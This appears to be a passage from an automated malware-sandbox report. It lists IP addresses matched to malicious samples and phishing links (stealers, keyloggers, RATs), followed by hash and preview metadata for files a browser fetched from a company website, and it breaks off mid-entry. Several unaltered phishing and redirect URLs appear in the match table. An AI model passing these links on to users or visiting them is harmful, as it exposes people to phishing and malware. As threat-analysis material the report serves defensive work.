                                                                                                                      https://u1.padletusercontent.com/uploads/padlet-uploads/3025704792/6a713d777f6a37c342ac9ff24818d63a/AContactinyourAddressBook.pdf?token=M4XZQk0-e0NegbPKN1EJFleeEg1SvAJHdhT-Qqn0IkrT5Su7By9B8urGCx2aLfmJMlgU5pPj_rq7vwJTjl3Mo83xjhy_G7fpTmckKxF_1H_Z492RSJiRSa3MofZP5-14SdBnispcHFsREDhhEifxgSR79jzwl3Q_R367A9ozgQRT4PbUB36zYP2FqxL7ZQfSwKjHH3FrzM2GPeTcuOwd8LrJMHGk1iqhNWgBjuGUF8BCo6b-0YxOTsq00c-_jwQFgXebvlVvdLX7cLMfAYfxPg==Get hashmaliciousUnknownBrowse
                                                                                                                      • 104.17.25.14
                                                                                                                      https://www.bing.com/ck/a?!&&p=5ceef533778c3decJmltdHM9MTcyMzQyMDgwMCZpZ3VpZD0zNjRmNjVlOC1lNTZjLTYxOWQtMTI1Ny03MTNlZTQyYTYwMTImaW5zaWQ9NTE0MA&ptn=3&ver=2&hsh=3&fclid=364f65e8-e56c-619d-1257-713ee42a6012&u=a1aHR0cHM6Ly9sZXhpbnZhcmlhbnQuY29tLw#aHR0cHM6Ly9iZVNyLndvbWdoY2NxLnJ1L1V6S2JvLw==Get hashmaliciousUnknownBrowse
                                                                                                                      • 104.17.25.14
                                                                                                                      https://d5h97x04.na1.hubspotlinksstarter.com/Ctc/2Q+113/d5H97x04/VV-M6D2dBFYlW421GWc7K7vL9W7Wb0M15p5chGN6wcHq23m2ndW69sMD-6lZ3mTW3sXdl26-SwxvW2P1jR26FfknmW5MqFpy1DycRpW8smQLW1d__ZwW8XrT451FSrhKW5wFRQF4yFrX6VwDxQv1HC-r9W3RVpBl8YFfg2W38lZmS4Tty8PW1WK9v274Crv8VHlkv-3jwwbXW3nmDJD2D7gDrN2DkYfnG_LhHW34mGlW2CxZ_1W4yJkrr7md1xFW7SGg83758qg9W34XFQD81BLk_W2B5NGc88WvhjW1-BmYr56s2CKW8RFXGn4l1S63f2FbPHW04Get hashmaliciousUnknownBrowse
                                                                                                                      • 104.17.25.14
                                                                                                                      https://protect.checkpoint.com/v2/r01/___https:/vlp6cm34.r.us-east-1.awstrack.me/Q5dmyyux:e7Ke7Kjrfnq.ynintwjuqD.htr*7Kh*7KjOBJBJLTmXFRFSIYBSOlvWZ1QLgoUfHylhY/JnF_riAUpCWczNA0yO_jaB*~*oG6AYM23pBoyDNMJ-PJR-NmPFsN*~*VgZA/PF0HUyICotYzOGFnKvZNBMhC*~*KfYclayEc_La*~*ccZq7wY-S_IKBLwx/KWAAv8MVfzRwNM6LCN8Jigf*~*80C6gkuabRjmLM--7qPAcOAlUFFI__5pCS9Bd6d565556c8b*~*/hi595-9hb*~3*gh-a*~*bg-9bgb-ci5/-b9jf76k5b9g*~*-555555do29l0Y3hHjFJM3POpxyJsMjDY*~*5=957___.YzJ1OndhaXRha2VyZXByaW1hcnk6YzpvOmNkMzFiOWRiNjRlNzYwZWExOWZkZjZlZWU4YmI5NjkyOjc6NjQxYjozOTM5M2Y5MjlmZWNkMGUzMGYzMjUxMGFiZDQ0YjU2Mzg5ODdlNDNlNTAyN2VlYjBmMjQxZjc3Mjg5OGNiMWQxOmg6VDpU%3EGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.17.24.14
                                                                                                                      [EXTERNAL] Fw_ LVW 1201831..emlGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.17.24.14
                                                                                                                      Wc pay benefit.pdfGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.17.24.14
                                                                                                                      ATT4802.htmlGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.17.24.14
                                                                                                                      Flumroc.docxGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.17.25.14
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      TELEGRAMRUP#U0142atno#U015b#U0107 8557899,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=pztuconjvsFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Furlz.fr/tiku#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      file.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      msedge.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.orgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      678763_PDF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      HALKBANK EFT RECEIPT DATED 02.12.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      #U00dcR#U00dcNLER 65Ve20_ B#U00fcy#U00fck mokapto Sipari#U015fi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      https://fn-fi.jimdosite.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      RFQ-2309540_27112024.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 149.154.167.220
                                                                                                                      CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 172.67.165.166
                                                                                                                      Recent Services Delays Update.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                                                                      • 104.17.247.203
                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 172.67.165.166
                                                                                                                      YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 104.21.36.62
                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 104.21.16.9
                                                                                                                      file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                                                                                      • 172.67.165.166
                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 172.67.165.166
                                                                                                                      P#U0142atno#U015b#U0107 8557899,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 172.67.177.134
                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 104.21.16.9
                                                                                                                      https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=pztuconjvsFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Furlz.fr/tiku#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 104.18.24.163
                                                                                                                      FASTLYUSfile.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 151.101.1.91
                                                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 151.101.65.91
                                                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 151.101.65.91
                                                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 151.101.1.91
                                                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 151.101.1.91
                                                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 151.101.65.91
                                                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 151.101.193.91
                                                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 151.101.129.91
                                                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 151.101.129.91
                                                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 151.101.1.91
                                                                                                                      AMAZON-02USRecent Services Delays Update.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                                                                      • 13.227.8.37
                                                                                                                      YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 13.248.169.48
                                                                                                                      https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=pztuconjvsFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Furlz.fr/tiku#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 13.227.8.64
                                                                                                                      .i.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 54.171.230.55
                                                                                                                      http://frame.wtfGet hashmaliciousUnknownBrowse
                                                                                                                      • 44.238.68.12
                                                                                                                      https://emailtransaction.com/?u=84775-2a97acb5884211437e2511ddc7c4e345386c33487a558c479c7af49e7f66170eGet hashmaliciousUnknownBrowse
                                                                                                                      • 52.217.44.238
                                                                                                                      agent.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 54.171.230.55
                                                                                                                      https://nahud.com/mailwizz-2.2.7/latest/index.php/campaigns/jm929ck1nc903/track-url/wh75022djq6fe/88db1e075fc0ca4d21e7c4fe4c14b76f34a46190Get hashmaliciousUnknownBrowse
                                                                                                                      • 54.185.22.79
                                                                                                                      ub8ehJSePAfc9FYqZIT6.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                      • 54.171.230.55
                                                                                                                      https://pro.arawato.pro/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 76.76.21.21
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      28a2c9bd18a11de089ef85a160da29e4KMS_VL_ALL_AIO.cmdGet hashmaliciousUnknownBrowse
                                                                                                                      • 4.245.163.56
                                                                                                                      • 172.202.163.200
                                                                                                                      • 13.107.246.63
                                                                                                                      • 23.218.208.109
                                                                                                                      Recent Services Delays Update.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                                                                      • 4.245.163.56
                                                                                                                      • 172.202.163.200
                                                                                                                      • 13.107.246.63
                                                                                                                      • 23.218.208.109
                                                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                      • 4.245.163.56
                                                                                                                      • 172.202.163.200
                                                                                                                      • 13.107.246.63
                                                                                                                      • 23.218.208.109
                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 4.245.163.56
                                                                                                                      • 172.202.163.200
                                                                                                                      • 13.107.246.63
                                                                                                                      • 23.218.208.109
                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 4.245.163.56
                                                                                                                      • 172.202.163.200
                                                                                                                      • 13.107.246.63
                                                                                                                      • 23.218.208.109
                                                                                                                      file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                                                                                      • 4.245.163.56
                                                                                                                      • 172.202.163.200
                                                                                                                      • 13.107.246.63
                                                                                                                      • 23.218.208.109
                                                                                                                      6DrfHb21Lt.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                      • 4.245.163.56
                                                                                                                      • 172.202.163.200
                                                                                                                      • 13.107.246.63
                                                                                                                      • 23.218.208.109
                                                                                                                      https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=pztuconjvsFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Furlz.fr/tiku#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                                                      • 4.245.163.56
                                                                                                                      • 172.202.163.200
                                                                                                                      • 13.107.246.63
                                                                                                                      • 23.218.208.109
                                                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                      • 4.245.163.56
                                                                                                                      • 172.202.163.200
                                                                                                                      • 13.107.246.63
                                                                                                                      • 23.218.208.109
                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 4.245.163.56
                                                                                                                      • 172.202.163.200
                                                                                                                      • 13.107.246.63
                                                                                                                      • 23.218.208.109
                                                                                                                      No context
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):10011
                                                                                                                      Entropy (8bit):7.669616884558006
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:tRnSNIoaSsL4JpFLWuuN4SZQxd1xRMj+ljYvn4eHl8ey0:jWnNrjYuuN4wQnjq+1GxyeH
                                                                                                                      MD5:CD770E0ACFB0A72B3DCDC1EB23BD2892
                                                                                                                      SHA1:CEF8108389DCA37466B9C316F9B4A4B32E80CE0E
                                                                                                                      SHA-256:80C737A89AF2E1B63EA4F0B2CBC67BC8F05F37BECB28BFE3A2192833AB5A7C3E
                                                                                                                      SHA-512:F745023F096F15942F4DEE320FC46C8E65BC7DEB05170DF757DE1BF1A3D0085C99B5D14AFA4E590D97B5C6730250751716F3BEBBF0FDC281B874D12C5757CABA
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d................\..........'.............................................................................................................................................J.J.........................................................................................@P!...1..."2#3.`$......................!..1AQa".q2@..Bb#..P..3$..Rr`...C4......................P!. .1a...A....................!1AQaPq...@.....`....0 ...............P.....................................................................................................................................................................n^..|..i.....@.............m.|Q.c...soc...^.............*..W.....;,.]}........'a!..................i~xV.-...'...oe..O.P.^..W...................Vv.........r.z...3...=...<..sY................V.7.m.w.....y.!].....-....^...S...........#...;f...N...k|.sQ....;).O.3)6..............!.+[~yr..w{....bc.5..H........_M..G...........<.m...~.\."..8...
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 322 x 227, 8-bit/color RGB, non-interlaced
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):79930
                                                                                                                      Entropy (8bit):7.994184553294263
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:1536:oRHTtnnn0P2B6QBa//VdEPb/h5VJsr0AmP2L6GQUua:+h0Pvx/VdEjccP2L6GQja
                                                                                                                      MD5:B3F2F5096CB31C031EBDB9D529D9416F
                                                                                                                      SHA1:2433B7E3882E6DA7041BF17963383FDA26BD2A28
                                                                                                                      SHA-256:1B73328821A9D0067B7E567DEA6FA479D2A660DD8E396396EBD6CED2F5D59EC5
                                                                                                                      SHA-512:9424ABF4552BD737A6A425466A3C081BB429578EA85A9470A2F94D5AB2C9DDC24C361DB209CA2A173500FB84C9E92753785B799D69CC1CAEB9B5793E2730B974
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:.PNG........IHDR...B............4....tEXtSoftware.Adobe ImageReadyq.e<..n.IDATx..I.lIv&f...u.../.eeV..X*V.......B..............N?B[mZ..H.A.F..A.^....U..$.M..XS.o....~.5;.3....$;..."....v..|.;...'....._t....F.z.|.z..............\.7.<..O.:e7'......^.;W.F.B.........;gqW.1..|.{.....~.k.........../..........#$..^.\....g././s... .#...._./...5:.y.wIt....n ]...0.......>.].....@...5..k..(oX>`.;.(...\S.Ip...~.....Cy8r.t...x,...H.K^.~...Yr......-....S..,.t..t=.......W.k.O.D...j.\................y...@.}..hX.%v.s}6..2.n.y......|\93..|..r...|%..K.K}.zf.s..X.m....-*v...z/..|.r/....4..r......'.....8...E..u.-B.'.\B.?E._...#..u...t..j.....^..../.O2......+.D/.:..l9.\F}(axc..'...&...^..wO._....;'.\.....b......V.&{..vK<.[.*..Q.$. .k.)..s.O}...x3..w.|.S.b._..@..l.|...!_..l.......P.=..PO..S..s..1...Nld...z.l....n.n!C...rW=.'?..r....].b9....v..A..>.......CI/@.M...Q..|..aY..r\.......EN.......3....t...K......_.........].;x..x&.%...=.BN..'%a..1..l..|..C.Z.X^1..h.....Z`
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (11126)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):11224
                                                                                                                      Entropy (8bit):5.2603128465032745
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:JrprDNvD66fPP/+I6OP1fQP0OIr96DB6MHXcwr1RF:JrprxG6fPP3P1fQMOIsDsMMS
                                                                                                                      MD5:79B4956B7EC478EC10244B5E2D33AC7D
                                                                                                                      SHA1:A46025B9D05E3DF30D610A8AEF14F392C7058DC9
                                                                                                                      SHA-256:029E0A2E809FD6B5DBE76ABE8B7A74936BE306C9A8C27C814C4D44AA54623300
                                                                                                                      SHA-512:217F86FEE871FA36ECA4F25830E3917C7BF57A681140B135C508AA32F2A1E3EFF5A80661F3B5BA46747D0C305AF10B658D207F449550F3D417D9683216FEEA8F
                                                                                                                      Malicious:false
                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                      URL:https://www.itnaledi.co.za/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
                                                                                                                      Preview:/*! jQuery Migrate v3.3.2 | (c) OpenJS Foundation and other contributors | jquery.org/license */."undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){return t(e,window)}):"object"==typeof module&&module.exports?module.exports=t(require("jquery"),window):t(jQuery,window)}(function(s,n){"use strict";function e(e){return 0<=function(e,t){for(var r=/^(\d+)\.(\d+)\.(\d+)/,n=r.exec(e)||[],o=r.exec(t)||[],i=1;i<=3;i++){if(+o[i]<+n[i])return 1;if(+n[i]<+o[i])return-1}return 0}(s.fn.jquery,e)}s.migrateVersion="3.3.2",n.console&&n.console.log&&(s&&e("3.0.0")||n.console.log("JQMIGRATE: jQuery 3.0.0+ REQUIRED"),s.migrateWarnings&&n.console.log("JQMIGRATE: Migrate plugin loaded multiple times"),n.console.log("JQMIGRATE: Migrate is installed"+(s.migrateMute?"":" with logging active")+", version "+s.migrateVersion));var r={};function u(e){var t=n.console;s.migrateDeduplicateWarnings&&r[e]||(r[e]=!0
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):6817
                                                                                                                      Entropy (8bit):7.3656419804802225
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:0aqjDmx+CVEeP1Le1bGT4bN+o+jPduwZkQ:0aCodaetiATK9gPcokQ
                                                                                                                      MD5:CF5B13294D302AE96469F818D5D7E042
                                                                                                                      SHA1:83FC84BA938CFE7890DDB1F41AD6356BA61BE38D
                                                                                                                      SHA-256:F07827E86BC790307A99C9CEBC9A1B85276F55C921F7E7F51171E9E1DB2D6751
                                                                                                                      SHA-512:EE3E8DF46CD7188D2DE186809B65F0A7F8CA3D8E4E3C67221F95A2438709DB0C8CE328EFD5F51C9B1CCC383980310028C45CACC192FC9C1DE0C5C99A313CF48C
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/2018/03/dellemc.jpg
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d................h........................................................................................................................................................J.J........................................................................................1.4@..... .!2350$P"#......................!1..Aq...2.Q."r30.a..B.s4 .Rb..CP..#.$.................P!.... a....................!1Q.Aaq.....0@.. ..P...............................................................................................................................................................................................................................................................................................|..z............_.:E.cw...I>].yG.....K't.......5..k`....P.5O.O...._7I..e>..8..U.nu.;Z.TU.b.9;....=....G.....?..E.i......7.s6'.@.&`xPK...q2h..0!.......Z.:.N..._....d..<.s.,{<.L.i._s..2^8.....f.......f%....qi.......Z.:.N....?...N].:...A....f..v
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:HTML document, ASCII text, with very long lines (1599)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):2559
                                                                                                                      Entropy (8bit):5.364088040968866
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:yMjDJX9QKCiYtkdkRVO86eZEiqqQ5FP2C5y75r2h:yMDJX9BCrtSYV4eZET5FX5Hh
                                                                                                                      MD5:E9EAFCF14DC822AF8291BE5E38CEFFFA
                                                                                                                      SHA1:310EDBB865FDF8E3A0A85938302E45960AFB0585
                                                                                                                      SHA-256:642E0D1016ADDBC10DB8802B4997C60E6D5F92C939905958413BCF875AE1C53B
                                                                                                                      SHA-512:D3922558048B227EB4CD23B0C9CDE9EBAC2F92E45550985FBDCD2404F94D3B267CDC84F43FB3E579A08CB6B8A17C1ED6BABF666E53053F2A003DE744F4AEB0D5
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      URL:https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3310.269575042676!2d18.506898950722725!3d-33.93419402979206!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x1dcc5c8fde768b55%3A0x739aec15f4472a9f!2sHoward+Terraces!5e0!3m2!1sen!2sza!4v1540463967394
                                                                                                                      Preview:<!DOCTYPE html>.<html>. <head>. <style type="text/css">. html, body, #mapDiv {. height: 100%;. margin: 0;. padding: 0;. }. </style>. </head>. <body>. <div id="mapDiv"></div>. . <script nonce="4d1d4nWPj1v-bscxw7iDwg">. function onEmbedLoad() {. initEmbed([null,null,null,null,null,[[[2,"spotlit",null,null,null,null,null,[null,null,null,null,null,null,null,null,null,null,11,null,[null,null,null,null,null,null,null,null,null,null,null,null,null,1]]]],null,null,[[null,null,null,null,null,null,null,null,null,null,null,null,null,[[["2147192895331273557","8330230039811926687"],"/g/11c6chb2vl",null,[3955626380,185092641],null,null,null,null,null,null,null,null,null,null,"gcid:corporate_office"],0,0,null,null,0,null,0]]]],null,["en_US"],[null,null,null,"/maps/api/js/ApplicationService.GetEntityDetails","/maps/embed/upgrade204",null,"/maps/embed/record204"],null,null,null,null,null,null,null,null,"bblOZ5r0CvavkdUPxZvPqQw",null,null,nu
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 533x227, components 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):25034
                                                                                                                      Entropy (8bit):7.968001246759225
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:v2lV4MVizZMp1+SrR7fZS/dXr403btp59G:vUV4IAMb+SrBfWr48tb9G
                                                                                                                      MD5:730DC2F3A364B72F72A4D4FCBDB8F71E
                                                                                                                      SHA1:5FFF25F191160A52F2751DFC25F53E76CFCCC96E
                                                                                                                      SHA-256:4E3A05721952297E26BD326E00E46A4C33A3E0A9316E2715EA119EFACD89ED23
                                                                                                                      SHA-512:CA28F73367B00D043DF93BCC93596EF99FFCA0A2A30F3BECD721E6C36DF9B057E7C642B7030582DB33F99E1418BF012CA6D119F7E588F110B9A2AE30CD102CAA
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d................a..&...=...a........................................................................................................................................................................................................................................ 0.@!.P1".2.`Ap#4$.....................!.1A.". 0Qa2.q.B.#3@.....R.brC.P......$4D...................!....................!.1A Qa0q...@....P................K..h....bT.....+.....:`....,...UP..N.U9T..#Y.s..[.v....q.#Z.....-h.Z.oE.9*'/.p.P..p.......L..AQ!.C.)....J.....:|P.U.!N.E..<.oI...|mI..Ik7.'.....3x..!...u...C.ET8.A.8A.F.@.c..%...)...5....,.}./%0.$ ..1.!E.<....[M8T#I..nj..u.G.a:f.cf.......QN.QN8.....H.. ..CEV.m..O-...+..QE.!.D..zU.0.....Kr...z.... .P.6...9._.U....b.T^N^9. ......uE....X.K8P.U...Jz.-..l.f....m@.`(I....Z..6x=T."...D.=...J.....ZLl.T.Ku.J......F..R.k..4....|....8.R.Uo:0.y`Y.V..[;..J..3eK>,.BU8...x...r(H.vj...C..?.........ns... ...A...Ma....bX....+.B.
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (17638)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):17741
                                                                                                                      Entropy (8bit):5.294608590099363
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:f7LTpKyzqrGGpLZo12xhMFoFlm5dwi7SeigzrLL:XTppX12j2LD7SeH
                                                                                                                      MD5:572D66E85091711B6EE76609573A8364
                                                                                                                      SHA1:332031949D78A49E8A18611556253660574E47DB
                                                                                                                      SHA-256:5CBDA29EA5096AC9404C59C77493A2F467D0EB4A27F16C750B61FC0D888DD716
                                                                                                                      SHA-512:CF8394AB0DFCA8D2E99F59626C037D06CA03C7A9DB3458A8E6503A0AE4E9F4D94AF376FCF61832095ABE37915D049A6D20DCEDC67D59DD268A48A512E543FAD1
                                                                                                                      Malicious:false
                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                      Preview:/*. * anime.js v3.2.1. * (c) 2020 Julian Garnier. * Released under the MIT license. * animejs.com. */..!function(n,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):n.anime=e()}(this,function(){"use strict";var n={update:null,begin:null,loopBegin:null,changeBegin:null,change:null,changeComplete:null,loopComplete:null,complete:null,loop:1,direction:"normal",autoplay:!0,timelineOffset:0},e={duration:1e3,delay:0,endDelay:0,easing:"easeOutElastic(1, .5)",round:0},t=["translateX","translateY","translateZ","rotate","rotateX","rotateY","rotateZ","scale","scaleX","scaleY","scaleZ","skew","skewX","skewY","perspective","matrix","matrix3d"],r={CSS:{},springs:{}};function a(n,e,t){return Math.min(Math.max(n,e),t)}function o(n,e){return n.indexOf(e)>-1}function u(n,e){return n.apply(null,e)}var i={arr:function(n){return Array.isArray(n)},obj:function(n){return o(Object.prototype.toString.call(n),"Object")},pth:function(n){retu
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):6564
                                                                                                                      Entropy (8bit):7.325978337127352
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:MCRkwlU8hP+l/OOAk0plpq+vivnhsLz03NVY3iosuFALkbG1pY9hLOx:BlUuGOOA5rq+o2P036XA4G49NOx
                                                                                                                      MD5:015746C89484A1F86707C1E9718998CB
                                                                                                                      SHA1:231FB5A7F692E7EC1E62F664AED8CB53986584E5
                                                                                                                      SHA-256:B704326AEE6F8387D25490FE9EB86DD8F7494FC424F4D03C0C880F0FC45C511D
                                                                                                                      SHA-512:9A34DB07FE08E64155E3357778CB5340792B83D10A28C9ADE01CA139706B88132E6BCAD554CA400CD8F209ED5384F9BA43A3F41BD7744639EA125B51BFAB4D6A
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/2018/03/lexmark.jpg
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d.........................................................................................................................................................................J.J......................................................................................5.P...0...4@.!%........................!1.AQq"2..a....B.#s0...Rr.3.P@.b..$...Cc....................q....................!1.AQaq ....0P..@................................................................................................................................................................................................................................................................................................."..u.................7.x.<.3.q.I.*.`..&e~.J.y(.bm..'r.l...tg..Y.$U....7.|.....7..D.%..s........6...K.............S..........j].....+...X!2.Nad.c%.....N%....9..5u...^=.d.k^.B.g.%m}...t....YvF..1#.......c/...'...WY..:~}.._..w..j.s.....k.?.K..3/j.s.....".
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (2946)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):2981
                                                                                                                      Entropy (8bit):5.174465669703351
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:Q7A9/XN5NjJE2aAOuRUUKfTGwAuw5BJmVhl2qFqyvQyOw835uuPkSEwVYql+9y5l:931Yf1AJ5m/FqyLn8pu4Zl+9y5It4yO9
                                                                                                                      MD5:492F2C1A7EA7EB83FE42E0FF7CB51AA2
                                                                                                                      SHA1:DB36A77F6AAA2063BFBEC02C2C0E967438C5A245
                                                                                                                      SHA-256:E174A58A503AB84B3D1B9DE12FD3895788204485170F1289E445F7B5B98EC789
